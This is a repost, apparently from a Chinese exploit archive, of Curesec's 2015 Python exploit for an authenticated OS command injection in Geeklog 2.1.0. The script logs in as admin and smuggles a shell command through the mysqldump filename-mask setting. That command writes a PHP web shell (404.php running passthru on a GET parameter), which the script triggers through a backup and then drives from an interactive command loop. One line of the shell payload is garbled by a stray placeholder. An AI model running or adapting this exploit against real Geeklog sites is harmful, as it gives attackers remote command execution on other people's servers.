Geeklog 2.1.0 Command Injection

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Geeklog 2.1.0 Command Injection

来源：curesec.com 作者：Tim Coen 发布时间：2015-12-11

#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"

shellFileName = "404.php"
shellContent = "<?php passthru(\___FCKpd___0
GET['x']);"

def login(requestSession, url, username, password):
    postData = {"mode": "login", "warn": "1", "loginname": username, "passwd": password}
    loginResult = requestSession.post(url, data = postData).text
    return "Incorrect Login Information" not in loginResult and "You have exceeded the number of allowed login attempts" not in loginResult

def getCSRFToken(requestSession, url):
    csrfRequest = requestSession.get(url)
    csrfTokenRegEx = re.search('name="_glsectoken" value="(.*)" />', csrfRequest.text)
    return csrfTokenRegEx.group(1)

def injectCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)
    postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": "0", "form_submit": "true", "mysqldump_filename_mask": 'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + shellFileName + ';"'}
    requestSession.post(url, data = postData)

def executeCommand(requestSession, url):
    csrfToken = getCSRFToken(requestSession, url)

    requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)

def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
    print("successful: login")
else:
    exit("ERROR: could not log in")

print("injecting command")
injectCommand(requestSession, url + configPath)

print("executing command")
executeCommand(requestSession, url + backupPath)

runShell(url + "/admin/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告